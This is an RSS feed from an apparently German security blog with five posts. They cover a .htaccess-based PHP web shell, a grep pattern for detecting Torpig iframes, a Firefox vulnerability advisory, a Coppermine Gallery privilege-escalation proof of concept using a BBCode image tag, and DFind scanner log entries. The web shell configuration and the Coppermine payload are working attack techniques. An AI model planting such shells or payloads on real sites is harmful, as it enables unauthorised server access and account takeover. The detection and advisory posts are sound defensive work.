<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>BotNetzProvider.de &#187; Exploits</title>
	<atom:link href="http://blog.botnetzprovider.de/category/sicherheit/exploits/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.botnetzprovider.de</link>
	<description>Ein Security Blog über Honig-Töpfe (honeypots) und Bots</description>
	<lastBuildDate>Sat, 19 Nov 2011 11:38:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>PHP-Shell in .htaccess Datei</title>
		<link>http://blog.botnetzprovider.de/2011/06/01/php-shell-in-htaccess-datei/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=php-shell-in-htaccess-datei</link>
		<comments>http://blog.botnetzprovider.de/2011/06/01/php-shell-in-htaccess-datei/#comments</comments>
		<pubDate>Wed, 01 Jun 2011 13:49:40 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[PHP-Shell]]></category>
		<category><![CDATA[php-shell]]></category>

		<guid isPermaLink="false">http://blog.botnetzprovider.de/?p=921</guid>
		<description><![CDATA[Vor kurzem habe ich einen Artikel von Eldar Marcussen gelesen. Er schreibt über die Einbindung von einer PHP-Shell in eine ".htaccess" Datei. Den Ansatz den er verfolgt ist ziemlich interessant, nur leider verursacht seine PHP-Shell zu viel Lärm in der "access_logs" des Webservers. Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" [...]]]></description>
			<content:encoded><![CDATA[<p>Vor kurzem habe ich einen Artikel von <a href="http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html">Eldar Marcussen</a> gelesen. Er schreibt über die Einbindung von einer PHP-Shell in eine <a href="http://de.wikipedia.org/wiki/Htaccess">".htaccess" </a>Datei. Den Ansatz den er verfolgt ist ziemlich interessant, nur leider verursacht seine PHP-Shell zu viel Lärm in der "access_logs" des Webservers. </p>
<p>Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" Datei nicht ausgeführt wird und man diese als URL erreichen kann. Als nächstes bearbeiten wir die Datei so, dass der Inhalt als normaler dynamischer Inhalt wieder gegeben wird vom Webserver. Die PHP-Shell muss auskommentiert werden in der ".htaccess", damit der Apache erst die Direktive interpretiert und nicht den PHP Code. Sobald man nun die Datei im Browser aufruft, wird der PHP Code in den PHP Tags <?php ... ?> ausgeführt und man hat eine funktionierende PHP-Shell. Ich habe mich für eine PHP-Shell die man via POST aufruft entschieden, um den Lärm in den access-logs so gering wie möglich zu halten. </p>
<p>Beispiel .htaccess:</p>
<pre class='brush: bash'>
# Orginal von http://www.justanotherhacker.com
# umgeschrieben von http://blog.botnetzprovider.de
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
# Apache sagen bitte die .htaccess Datei als PHP interpretieren.
AddType application/x-httpd-php .htaccess

# Botnetzprovider PHP-Shell
### php eval($_POST['botnetzprovider_sais']);  shell ist so nicht funktionsfähig #
</pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2011/06/01/php-shell-in-htaccess-datei/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>torpig/mebroot drive-by downloads erkennen via (z)grep</title>
		<link>http://blog.botnetzprovider.de/2009/05/13/torpigmebroot-drive-by-downloads-erkennen-via-zgrep/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=torpigmebroot-drive-by-downloads-erkennen-via-zgrep</link>
		<comments>http://blog.botnetzprovider.de/2009/05/13/torpigmebroot-drive-by-downloads-erkennen-via-zgrep/#comments</comments>
		<pubDate>Wed, 13 May 2009 18:04:07 +0000</pubDate>
		<dc:creator>mcm</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[Skripte]]></category>
		<category><![CDATA[grep]]></category>
		<category><![CDATA[torpig]]></category>

		<guid isPermaLink="false">http://blog.botnetzprovider.de/?p=406</guid>
		<description><![CDATA[Für alle die Ihren Webspace durchsuchen wollen nach bösartigen IFRAMES hier ein kleiner String: Dieser String ist gut für die meisten verschlüsselten Torpig/Mebroot IFRAMES. SSH Zugang wird natürlich vorausgesetzt. Im root Verzeichnis ausführen. $ (z)grep -Rl 'function .(.){r="";for(i=0;i&#38;lt;..length;i++){if(..charAt(i)=="."){..="%"}else{..=..cha' * Natürlich keine Gewähr auf 100% Trefferquote, da es sich dabei um einen statistischen Link handelt. Ich [...]]]></description>
			<content:encoded><![CDATA[<p>Für alle die Ihren Webspace durchsuchen wollen nach bösartigen IFRAMES hier ein kleiner String:<br />
Dieser String ist gut für die meisten verschlüsselten Torpig/Mebroot IFRAMES.<br />
SSH Zugang wird natürlich vorausgesetzt.<br />
Im root Verzeichnis ausführen.</p>
<p><code>$ (z)grep -Rl 'function .(.){r="";for(i=0;i&amp;lt;..length;i++){if(..charAt(i)=="."){..="%"}else{..=..cha' *</code></p>
<p>Natürlich keine Gewähr auf 100% Trefferquote, da es sich dabei um einen statistischen Link handelt. Ich habe aus 42 JavaScript IFRAMES dieses Pattern gebastelt. Grep oder zgrep müsst Ihr entscheiden, je nach Dateien.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/05/13/torpigmebroot-drive-by-downloads-erkennen-via-zgrep/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Firefox Exploit &#8211; Risk: high</title>
		<link>http://blog.botnetzprovider.de/2009/03/28/firefox-exploit-risk-high/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=firefox-exploit-risk-high</link>
		<comments>http://blog.botnetzprovider.de/2009/03/28/firefox-exploit-risk-high/#comments</comments>
		<pubDate>Fri, 27 Mar 2009 22:12:43 +0000</pubDate>
		<dc:creator>mcm</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[firefox]]></category>

		<guid isPermaLink="false">http://botnetzprovider.de/blog/?p=327</guid>
		<description><![CDATA[Art: XSL parsing remote memory corruption poc Alle die Firefox in den folgenden Versionen nutzen Mozilla Firefox 3.0.7 Mozilla Firefox 3.0.6 Mozilla Firefox 3.0.5 Mozilla Firefox 3.0.4 Mozilla Firefox 3.0.3 Mozilla Firefox 3.0.2 Mozilla Firefox 3.0.1 Mozilla Firefox 3.0 !Windows und Linux User! sind gefährdet. Erste Infos gab es dazu auf mailw0rm. Laut Firefox wird [...]]]></description>
			<content:encoded><![CDATA[<pre>Art: XSL parsing remote memory corruption poc</pre>
<p>Alle die Firefox in den folgenden Versionen nutzen</p>
<p>Mozilla Firefox 3.0.7<br />
Mozilla Firefox 3.0.6<br />
Mozilla Firefox 3.0.5<br />
Mozilla Firefox 3.0.4<br />
Mozilla Firefox 3.0.3<br />
Mozilla Firefox 3.0.2<br />
Mozilla Firefox 3.0.1<br />
Mozilla Firefox  3.0</p>
<p><strong>!Windows und Linux User!</strong><br />
<strong>sind gefährdet. </strong></p>
<p>Erste Infos gab es dazu auf <a href="http://milw0rm.com/exploits/8285">mailw0rm.</a></p>
<p>Laut Firefox wird es erst am 01.April ein Fix dazu geben.</p>
<p>Wie kann ich davor schützen:<br />
1. NoScript installieren (Ein AddOn für Firefox) <a href="http://noscript.net/">http://noscript.net/</a><br />
Keine Skripte ausführen bis ein Fix von Firefox herausgegeben wurde.</p>
<p>Offizielle Infos von Firefox <a href="http://blog.mozilla.com/security/2009/03/26/cansecwest-2009-pwn2own-exploit-and-xsl-transform-vulnerability/">HIER</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/03/28/firefox-exploit-risk-high/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Coppermine Photo Gallery </title>
		<link>http://blog.botnetzprovider.de/2009/02/27/coppermine-photo-gallery/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=coppermine-photo-gallery</link>
		<comments>http://blog.botnetzprovider.de/2009/02/27/coppermine-photo-gallery/#comments</comments>
		<pubDate>Fri, 27 Feb 2009 12:49:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Exploits]]></category>

		<guid isPermaLink="false">http://botnetzprovider.de/blog/?p=172</guid>
		<description><![CDATA[+--------------------------------------------------------------------------+ &#124; Coppermine Photo Gallery &#60;= 1.4.20 (BBCode IMG) Privilege Escalation PoC &#124; +--------------------------------------------------------------------------+ &#124; by Juri Gianni aka yeat - staker[at]hotmail[dot]it &#124; &#124; http://coppermine-gallery.net &#124; &#124; Don't add me on msn messenger. &#124; &#124; This vulnerability can be named as "bbcode img tag script injection" &#124; +--------------------------------------------------------------------------+ &#124; Proof of Concept (an example,to understand [...]]]></description>
			<content:encoded><![CDATA[<p>+--------------------------------------------------------------------------+<br />
| Coppermine Photo Gallery &lt;= 1.4.20 (BBCode IMG) Privilege Escalation PoC |<br />
+--------------------------------------------------------------------------+<br />
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it                       |<br />
| http://coppermine-gallery.net                                            |<br />
| Don't add me on msn messenger.                                           |<br />
| This vulnerability can be named as "bbcode img tag script injection"     |<br />
+--------------------------------------------------------------------------+<br />
| Proof of Concept  (an example,to understand it)                          |<br />
+--------------------------------------------------------------------------+<br />
URL: http://[host]/[path]/delete.php?id=u[ID]&amp;u[ID]=&amp;action=change_group&amp;what=user&amp;new_password=&amp;group=1&amp;delete_files=no&amp;delete_comments=no<br />
[img]URL[/img]<br />
+--------------------------------------------------------------------------+<br />
| Modify [ID] with your user id.                                           |<br />
| Go http://[host]/[path]/displayimage.php?album=random&amp;pos=[album id]     |<br />
+--------------------------------------------------------------------------+<br />
Insert the below code into a new message</p>
<p>hey admin,nice web site <img src='http://blog.botnetzprovider.de/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
[img]http://[host]/[path]/delete.php?id=u3&amp;u3=&amp;action=change_group&amp;what=user&amp;new_password=&amp;group=1&amp;delete_files=no&amp;delete_comments=no[/img]</p>
<p>+-------------------------------------------------------------------------+<br />
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |<br />
| You'll become admin when the real admin will visit the page             |<br />
+-------------------------------------------------------------------------+</p>
<p><a href="http://www.milw0rm.com/exploits/8114"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/02/27/coppermine-photo-gallery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>w00tw00t.at.ISC.SANS.DFind</title>
		<link>http://blog.botnetzprovider.de/2009/02/26/w00tw00tatiscsansdfind/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=w00tw00tatiscsansdfind</link>
		<comments>http://blog.botnetzprovider.de/2009/02/26/w00tw00tatiscsansdfind/#comments</comments>
		<pubDate>Thu, 26 Feb 2009 08:03:22 +0000</pubDate>
		<dc:creator>mcm</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[Fingerprint von DFind]]></category>
		<category><![CDATA[w00tw00t.at.ISC.SANS.DFind]]></category>

		<guid isPermaLink="false">http://botnetzprovider.de/blog/?p=160</guid>
		<description><![CDATA[Schon seit längerem sind in den (Apache-)Logs meiner Server einige seltsame Zeilen zu finden (Ursprungs-IP wurde unkenntlich gemacht): xxx.xxx.xxx.xxx - - [30/Sep/2007:12:48:33 +0200] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 395 “-” “-” Diese Zeilen sind der Fingerprint von DFind, einem vulnerability Scanner, der den Server auf Schwachstellen durchsucht. Bei Symantec kennt man das Tool als “Hacktool.DFind” - [...]]]></description>
			<content:encoded><![CDATA[<div class="continut">
<p>Schon seit längerem sind in den (Apache-)Logs meiner Server einige seltsame Zeilen zu finden (Ursprungs-IP wurde unkenntlich gemacht):</p>
<p><code>xxx.xxx.xxx.xxx - - [30/Sep/2007:12:48:33 +0200] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 395 “-” “-”</code></p>
<p>Diese Zeilen sind der <a href="http://isc.sans.org/diary.html?storyid=900" target="_blank">Fingerprint von DFind</a>, einem vulnerability Scanner, der den Server auf Schwachstellen durchsucht. Bei Symantec kennt man das Tool als “<a href="http://www.symantec.com/security_response/writeup.jsp?docid=2005-011411-1411-99&amp;tabid=2" target="_blank">Hacktool.DFind</a>” - dort ist auch eine Liste von Schwachstellen, auf die das Programm mögliche Opfer testet.</p>
<p>In letzter Zeit häufen sich Angriffsversuche von IP’s, die aus Adressbereichen von Hostern kommen.</p></div>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/02/26/w00tw00tatiscsansdfind/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

